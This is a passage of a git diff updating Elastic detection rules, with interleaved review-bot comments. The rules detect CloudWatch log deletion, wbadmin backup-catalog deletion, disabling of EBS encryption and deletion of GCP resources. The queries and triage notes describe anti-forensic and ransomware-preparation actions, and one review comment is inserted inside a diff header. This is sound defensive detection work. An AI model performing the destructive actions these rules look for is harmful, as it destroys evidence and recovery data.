to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. Work with\nyour IT teams to minimize the impact on business operations during these actions.\n- Check if unauthorized new users were created, remove unauthorized new accounts, and request password resets for other IAM users.\n- Consider enabling multi-factor authentication for users.\n- Review the permissions assigned to the implicated user to ensure that the least privilege principle is being followed.\n- Implement security best practices [outlined](https://aws.amazon.com/premiumsupport/knowledge-center/security-best-practices/) by AWS.\n- Take the actions needed to return affected systems, data, or services to their normal operational levels.\n- Identify the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "event.dataset:aws.cloudtrail and event.provider:logs.amazonaws.com and event.action:DeleteLogGroup and event.outcome:success\n", "references": [ "https://awscli.amazonaws.com/v2/documentation/api/latest/reference/logs/delete-log-group.html", "https://docs.aws.amazon.com/AmazonCloudWatchLogs/latest/APIReference/API_DeleteLogGroup.html" ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "1.10.2" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": 
"keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "68a7a5a5-a2fc-4a76-ba9f-26849de881b4", + "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -73,5 +103,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 7 + "version": 9 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_cloudwatch_log_stream_deletion.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_cloudwatch_log_stream_deletion.json index 930dc822eea03..872cd1d3c50c1 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_cloudwatch_log_stream_deletion.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_cloudwatch_log_stream_deletion.json 
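Review bot: The sibling "AWS CloudWatch Log Stream Deletion" rule in this same commit gains an `"Impact"` tag, while this hunk leaves the Log Group Deletion tag list untouched; unless the tag is already present outside the hunk, the two rules end up tagged inconsistently, so the same `"Impact"` tag should be added here. In the new triage note, the bullet "Investigate the deleted log group's criticality" would be more actionable if it told the analyst where to look: the `logGroupName` request parameter of the `DeleteLogGroup` event, and whether that group was a delivery target for CloudTrail, VPC Flow Logs, GuardDuty or Lambda security automation, in which case the deletion is also a loss of evidence. A false-positive bullet about infrastructure-as-code teardowns (stack deletion removes log groups in bulk) would help, since the current FP guidance only suggests user/IP exceptions.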
@@ -15,14 +15,44 @@ "language": "kuery", "license": "Elastic License v2", "name": "AWS CloudWatch Log Stream Deletion", - "note": "## Config\n\nThe AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "## Triage and analysis\n\n### Investigating AWS CloudWatch Log Stream Deletion\n\nAmazon CloudWatch is a monitoring and observability service that collects monitoring and operational data in the form of\nlogs, metrics, and events for resources and applications. This data can be used to detect anomalous behavior in your environments, set alarms, visualize\nlogs and metrics side by side, take automated actions, troubleshoot issues, and discover insights to keep your\napplications running smoothly.\n\nA log stream is a sequence of log events that share the same source. Each separate source of logs in CloudWatch Logs\nmakes up a separate log stream.\n\nThis rule looks for the deletion of a log stream using the API `DeleteLogStream` action. 
Attackers can do this to cover\ntheir tracks and impact security monitoring that relies on these sources.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user account during the past 48 hours.\n- Contact the account and resource owners and confirm whether they are aware of this activity.\n- Check if this operation was approved and performed according to the organization's change management policy.\n- Considering the source IP address and geolocation of the user who issued the command:\n - Do they look normal for the calling user?\n - If the source is an EC2 IP address, is it associated with an EC2 instance in one of your accounts or is the source\n IP from an EC2 instance that's not under your control?\n - If it is an authorized EC2 instance, is the activity associated with normal behavior for the instance role or roles?\n Are there any other alerts or signs of suspicious activity involving this instance?\n- Investigate the deleted log stream's criticality and whether the responsible team is aware of the deletion.\n- If you suspect the account has been compromised, scope potentially compromised assets by tracking servers, services,\nand data accessed by the account in the last 24 hours.\n\n### False positive analysis\n\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a\ncombination of user and IP address conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your 
IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. Work with\nyour IT teams to minimize the impact on business operations during these actions.\n- Check if unauthorized new users were created, remove unauthorized new accounts, and request password resets for other IAM users.\n- Consider enabling multi-factor authentication for users.\n- Review the permissions assigned to the implicated user to ensure that the least privilege principle is being followed.\n- Implement security best practices [outlined](https://aws.amazon.com/premiumsupport/knowledge-center/security-best-practices/) by AWS.\n- Take the actions needed to return affected systems, data, or services to their normal operational levels.\n- Identify the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "event.dataset:aws.cloudtrail and event.provider:logs.amazonaws.com and event.action:DeleteLogStream and event.outcome:success\n", "references": [ "https://awscli.amazonaws.com/v2/documentation/api/latest/reference/logs/delete-log-stream.html", "https://docs.aws.amazon.com/AmazonCloudWatchLogs/latest/APIReference/API_DeleteLogStream.html" ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "1.10.2" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + 
"type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "d624f0ae-3dd1-4856-9aad-ccfe4d4bfa17", + "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -30,7 +60,8 @@ "AWS", "Continuous Monitoring", "SecOps", - "Log Auditing" + "Log Auditing", + "Impact" ], "threat": [ { @@ -73,5 +104,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 7 + "version": 9 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_deleting_backup_catalogs_with_wbadmin.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_deleting_backup_catalogs_with_wbadmin.json index 1dc41bd4bab5f..43f50f4a97ce1 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_deleting_backup_catalogs_with_wbadmin.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_deleting_backup_catalogs_with_wbadmin.json 
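Review bot: The added investigation step "Investigate the deleted log stream's criticality" gives no pointer to the data that identifies the stream; `DeleteLogStream` requires both `logGroupName` and `logStreamName` (per the referenced API document), so the bullet should direct the analyst to those request parameters and to confirm which source, such as a specific Lambda function, EC2 instance or ECS task, wrote to that stream. Suggested wording: `- Identify the log group and stream from the logGroupName and logStreamName request parameters, determine which resource wrote to that stream, and check whether the deletion removed evidence of activity on that resource.` Since a deleted stream cannot be recovered, the response section could add a step to pull any copies from S3 export, a subscription filter destination or a cross-account/centralized logging account before scoping the incident.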
@@ -12,10 +12,33 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "Deleting Backup Catalogs with Wbadmin",
- "note": "## Triage and analysis\n\n### Investigating Deleting Backup Catalogs with Wbadmin\n\nWindows Server Backup stores the details about your backups (what volumes are backed up and where the backups are\nlocated) in a file called a backup catalog, which ransomware victims can use to recover corrupted backup files.\nDeleting these files is a common step in threat actor playbooks.\n\nThis rule identifies the deletion of the backup catalog using the `wbadmin.exe` utility.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Check if any files on the host machine have been encrypted.\n\n### False positive analysis\n\n- Administrators can use this command to delete corrupted catalogs, but overall the activity is unlikely to be legitimate.\n\n### Related rules\n\n- Third-party Backup Files Deleted via Unexpected Process - 11ea6bec-ebde-4d71-a8e9-784948f8e3e9\n- Volume Shadow Copy Deleted or Resized via VssAdmin - b5ea4bfe-a1b2-421f-9d47-22a75a6f2921\n- Volume Shadow Copy Deletion via PowerShell - d99a037b-c8e2-47a5-97b9-170d076827c4\n- Volume Shadow Copy Deletion via WMIC - dc9c1f74-dac3-48e3-b47f-eb79db358f57\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Consider isolating the 
involved host to prevent destructive behavior, which is commonly associated with this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- If any other destructive action was identified on the host, it is recommended to prioritize the investigation and look\nfor ransomware preparation and execution activities.\n- If any backups were affected:\n - Perform data recovery locally or restore the backups from replicated copies (cloud, other servers, etc.).\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n",
+ "note": "## Triage and analysis\n\n### Investigating Deleting Backup Catalogs with Wbadmin\n\nWindows Server Backup stores the details about your backups (what volumes are backed up and where the backups are\nlocated) in a file called a backup catalog, which ransomware victims can use to recover corrupted backup files.\nDeleting these files is a common step in threat actor playbooks.\n\nThis rule identifies the deletion of the backup catalog using the `wbadmin.exe` utility.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Check if any files on the host machine have been encrypted.\n\n### False positive analysis\n\n- Administrators can use this command to delete corrupted catalogs, but overall the activity is unlikely to be legitimate.\n\n### Related rules\n\n- Third-party Backup Files Deleted via Unexpected Process - 11ea6bec-ebde-4d71-a8e9-784948f8e3e9\n- Volume Shadow Copy Deleted or Resized via VssAdmin - b5ea4bfe-a1b2-421f-9d47-22a75a6f2921\n- Volume Shadow Copy Deletion via PowerShell - d99a037b-c8e2-47a5-97b9-170d076827c4\n- Volume Shadow Copy Deletion via WMIC - dc9c1f74-dac3-48e3-b47f-eb79db358f57\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Consider isolating the involved host to prevent destructive behavior, which is commonly associated with this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- If any other destructive action was identified on the host, it is recommended to prioritize the investigation and look\nfor ransomware preparation and execution activities.\n- If any backups were affected:\n - Perform data recovery locally or restore the backups from replicated copies (cloud, other servers, etc.).\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).",
 "query": "process where event.type in (\"start\", \"process_started\") and\n (process.name : \"wbadmin.exe\" or process.pe.original_file_name == \"WBADMIN.EXE\") and\n process.args : \"catalog\" and process.args : \"delete\"\n",
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.args",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.name",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.pe.original_file_name",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 21,
 "rule_id": "581add16-df76-42bb-af8e-c979bfb39a59",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "low",
 "tags": [
 "Elastic",
@@ -43,5 +66,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "eql",
- "version": 12
+ "version": 14
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_ec2_disable_ebs_encryption.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_ec2_disable_ebs_encryption.json
index 04f1adaee3edb..6c9c7adbb79db 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_ec2_disable_ebs_encryption.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_ec2_disable_ebs_encryption.json
@@ -15,15 +15,45 @@
 "language": "kuery",
 "license": "Elastic License v2",
 "name": "AWS EC2 Encryption Disabled",
- "note": "## Config\n\nThe AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
+ "note": "",
 "query": "event.dataset:aws.cloudtrail and event.provider:ec2.amazonaws.com and event.action:DisableEbsEncryptionByDefault and event.outcome:success\n",
 "references": [
 "https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/EBSEncryption.html",
 "https://awscli.amazonaws.com/v2/documentation/api/latest/reference/ec2/disable-ebs-encryption-by-default.html",
 "https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DisableEbsEncryptionByDefault.html"
 ],
+ "related_integrations": [
+ {
+ "integration": "cloudtrail",
+ "package": "aws",
+ "version": "1.10.2"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.action",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.dataset",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.outcome",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.provider",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 47,
 "rule_id": "bb9b13b2-1700-48a8-a750-b43b0a72ab69",
+ "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -59,5 +89,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "query",
- "version": 6
+ "version": 8
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_efs_filesystem_or_mount_deleted.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_efs_filesystem_or_mount_deleted.json
index 9a20a97b632fa..88a6d9119fa9e 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_efs_filesystem_or_mount_deleted.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_efs_filesystem_or_mount_deleted.json
@@ -15,14 +15,44 @@
 "language": "kuery",
 "license": "Elastic License v2",
 "name": "AWS EFS File System or Mount Deleted",
- "note": "## Config\n\nThe AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
- "query": "event.dataset:aws.cloudtrail and event.provider:elasticfilesystem.amazonaws.com and \nevent.action:(DeleteMountTarget or DeleteFileSystem) and event.outcome:success\n",
+ "note": "",
+ "query": "event.dataset:aws.cloudtrail and event.provider:elasticfilesystem.amazonaws.com and\nevent.action:(DeleteMountTarget or DeleteFileSystem) and event.outcome:success\n",
 "references": [
 "https://docs.aws.amazon.com/efs/latest/ug/API_DeleteFileSystem.html",
 "https://docs.aws.amazon.com/efs/latest/ug/API_DeleteMountTarget.html"
 ],
+ "related_integrations": [
+ {
+ "integration": "cloudtrail",
+ "package": "aws",
+ "version": "1.10.2"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.action",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.dataset",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.outcome",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.provider",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 47,
 "rule_id": "536997f7-ae73-447d-a12d-bff1e8f5f0a0",
+ "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -51,5 +81,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "query",
- "version": 3
+ "version": 5
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_gcp_iam_role_deletion.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_gcp_iam_role_deletion.json
index f67419f5746ce..5b382eff18c96 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_gcp_iam_role_deletion.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_gcp_iam_role_deletion.json
@@ -13,13 +13,37 @@
 "language": "kuery",
 "license": "Elastic License v2",
 "name": "GCP IAM Role Deletion",
- "note": "## Config\n\nThe GCP Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
- "query": "event.dataset:(googlecloud.audit or gcp.audit) and event.action:google.iam.admin.v*.DeleteRole and event.outcome:success\n",
+ "note": "",
+ "query": "event.dataset:gcp.audit and event.action:google.iam.admin.v*.DeleteRole and event.outcome:success\n",
 "references": [
 "https://cloud.google.com/iam/docs/understanding-roles"
 ],
+ "related_integrations": [
+ {
+ "package": "gcp",
+ "version": "1.10.0"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.action",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.dataset",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.outcome",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 21,
 "rule_id": "e2fb5b18-e33c-4270-851e-c3d675c9afcd",
+ "setup": "The GCP Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
 "severity": "low",
 "tags": [
 "Elastic",
@@ -48,5 +72,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "query",
- "version": 6
+ "version": 8
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_gcp_service_account_deleted.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_gcp_service_account_deleted.json
index e928a60c132f6..11427385c661f 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_gcp_service_account_deleted.json
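Review bot: The replacement `+ "query"` line narrows `event.dataset:(googlecloud.audit or gcp.audit)` to `event.dataset:gcp.audit`, so audit events still indexed under the legacy `googlecloud.audit` dataset name stop matching and this rule goes quiet for those sources without any error being raised. The same narrowing is made in the GCP Service Account Deletion, GCP Service Account Disabled and GCP Storage Bucket Deletion hunks that follow. If dropping the legacy dataset is intended, the new `setup` string still advertises "Filebeat module, or similarly structured data" and should name the dataset it now depends on, e.g. `"setup": "The GCP Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule. Events must carry event.dataset:gcp.audit; the legacy googlecloud.audit dataset is no longer matched."`. The rule's `index` patterns are outside this hunk; if they still include `filebeat-*`, it is worth confirming that data landing on that pattern is produced with the `gcp.audit` dataset name.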
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_gcp_service_account_deleted.json
@@ -13,13 +13,37 @@
 "language": "kuery",
 "license": "Elastic License v2",
 "name": "GCP Service Account Deletion",
- "note": "## Config\n\nThe GCP Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
- "query": "event.dataset:(googlecloud.audit or gcp.audit) and event.action:google.iam.admin.v*.DeleteServiceAccount and event.outcome:success\n",
+ "note": "",
+ "query": "event.dataset:gcp.audit and event.action:google.iam.admin.v*.DeleteServiceAccount and event.outcome:success\n",
 "references": [
 "https://cloud.google.com/iam/docs/service-accounts"
 ],
+ "related_integrations": [
+ {
+ "package": "gcp",
+ "version": "1.10.0"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.action",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.dataset",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.outcome",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 47,
 "rule_id": "8fb75dda-c47a-4e34-8ecd-34facf7aad13",
+ "setup": "The GCP Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -48,5 +72,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "query",
- "version": 5
+ "version": 7
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_gcp_service_account_disabled.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_gcp_service_account_disabled.json
index 6c205987eaf17..47ea948098ef8 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_gcp_service_account_disabled.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_gcp_service_account_disabled.json
@@ -13,13 +13,37 @@
 "language": "kuery",
 "license": "Elastic License v2",
 "name": "GCP Service Account Disabled",
- "note": "## Config\n\nThe GCP Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
- "query": "event.dataset:(googlecloud.audit or gcp.audit) and event.action:google.iam.admin.v*.DisableServiceAccount and event.outcome:success\n",
+ "note": "",
+ "query": "event.dataset:gcp.audit and event.action:google.iam.admin.v*.DisableServiceAccount and event.outcome:success\n",
 "references": [
 "https://cloud.google.com/iam/docs/service-accounts"
 ],
+ "related_integrations": [
+ {
+ "package": "gcp",
+ "version": "1.10.0"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.action",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.dataset",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.outcome",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 47,
 "rule_id": "bca7d28e-4a48-47b1-adb7-5074310e9a61",
+ "setup": "The GCP Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -48,5 +72,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "query",
- "version": 5
+ "version": 7
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_gcp_storage_bucket_deleted.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_gcp_storage_bucket_deleted.json
index 9d28009acb13b..3b750314cf3e7 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_gcp_storage_bucket_deleted.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_gcp_storage_bucket_deleted.json
@@ -13,13 +13,32 @@
 "language": "kuery",
 "license": "Elastic License v2",
 "name": "GCP Storage Bucket Deletion",
- "note": "## Config\n\nThe GCP Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
- "query": "event.dataset:(googlecloud.audit or gcp.audit) and event.action:\"storage.buckets.delete\"\n",
+ "note": "",
+ "query": "event.dataset:gcp.audit and event.action:\"storage.buckets.delete\"\n",
 "references": [
 "https://cloud.google.com/storage/docs/key-terms#buckets"
 ],
+ "related_integrations": [
+ {
+ "package": "gcp",
+ "version": "1.10.0"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.action",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.dataset",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 47,
 "rule_id": "bc0f2d83-32b8-4ae2-b0e6-6a45772e9331",
+ "setup": "The GCP Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -48,5 +67,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "query",
- "version": 6
+ "version": 8
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_gcp_virtual_private_cloud_network_deleted.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_gcp_virtual_private_cloud_network_deleted.json
deleted file mode 100644
index 2748a1f573e9f..0000000000000
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_gcp_virtual_private_cloud_network_deleted.json
+++ /dev/null
@@ -1,35 +0,0 @@
-{
- "author": [
- "Elastic"
- ],
- "description": "Identifies when a Virtual Private Cloud (VPC) network is deleted in Google Cloud Platform (GCP). A VPC network is a virtual version of a physical network within a GCP project. Each VPC network has its own subnets, routes, and firewall, as well as other elements. An adversary may delete a VPC network in order to disrupt their target's network and business operations.",
- "false_positives": [
- "Virtual Private Cloud networks may be deleted by system administrators. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior."
- ],
- "index": [
- "filebeat-*",
- "logs-gcp*"
- ],
- "language": "kuery",
- "license": "Elastic License v2",
- "name": "GCP Virtual Private Cloud Network Deletion",
- "note": "## Config\n\nThe GCP Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
- "query": "event.dataset:(googlecloud.audit or gcp.audit) and event.action:v*.compute.networks.delete and event.outcome:success\n",
- "references": [
- "https://cloud.google.com/vpc/docs/vpc"
- ],
- "risk_score": 47,
- "rule_id": "c58c3081-2e1d-4497-8491-e73a45d1a6d6",
- "severity": "medium",
- "tags": [
- "Elastic",
- "Cloud",
- "GCP",
- "Continuous Monitoring",
- "SecOps",
- "Configuration Audit"
- ],
- "timestamp_override": "event.ingested",
- "type": "query",
- "version": 5
-}
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_gcp_virtual_private_cloud_route_created.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_gcp_virtual_private_cloud_route_created.json
deleted file mode 100644
index 143d7138d8bad..0000000000000
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_gcp_virtual_private_cloud_route_created.json
+++ /dev/null
@@ -1,36 +0,0 @@
-{
- "author": [
- "Elastic"
- ],
- "description": "Identifies when a virtual private cloud (VPC) route is created in Google Cloud Platform (GCP). Google Cloud routes define the paths that network traffic takes from a virtual machine (VM) instance to other destinations. These destinations can be inside a Google VPC network or outside it. An adversary may create a route in order to impact the flow of network traffic in their target's cloud environment.",
- "false_positives": [
- "Virtual Private Cloud routes may be created by system administrators. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior."
- ],
- "index": [
- "filebeat-*",
- "logs-gcp*"
- ],
- "language": "kuery",
- "license": "Elastic License v2",
- "name": "GCP Virtual Private Cloud Route Creation",
- "note": "## Config\n\nThe GCP Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
- "query": "event.dataset:(googlecloud.audit or gcp.audit) and event.action:(v*.compute.routes.insert or \"beta.compute.routes.insert\")\n",
- "references": [
- "https://cloud.google.com/vpc/docs/routes",
- "https://cloud.google.com/vpc/docs/using-routes"
- ],
- "risk_score": 21,
- "rule_id": "9180ffdf-f3d0-4db3-bf66-7a14bcff71b8",
- "severity": "low",
- "tags": [
- "Elastic",
- "Cloud",
- "GCP",
- "Continuous Monitoring",
- "SecOps",
- "Configuration Audit"
- ],
- "timestamp_override": "event.ingested",
- "type": "query",
- "version": 7
-}
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_gcp_virtual_private_cloud_route_deleted.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_gcp_virtual_private_cloud_route_deleted.json
deleted file mode 100644
index 0d4f5591c9688..0000000000000
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_gcp_virtual_private_cloud_route_deleted.json
+++ /dev/null
@@ -1,36 +0,0 @@
-{
- "author": [
- "Elastic"
- ],
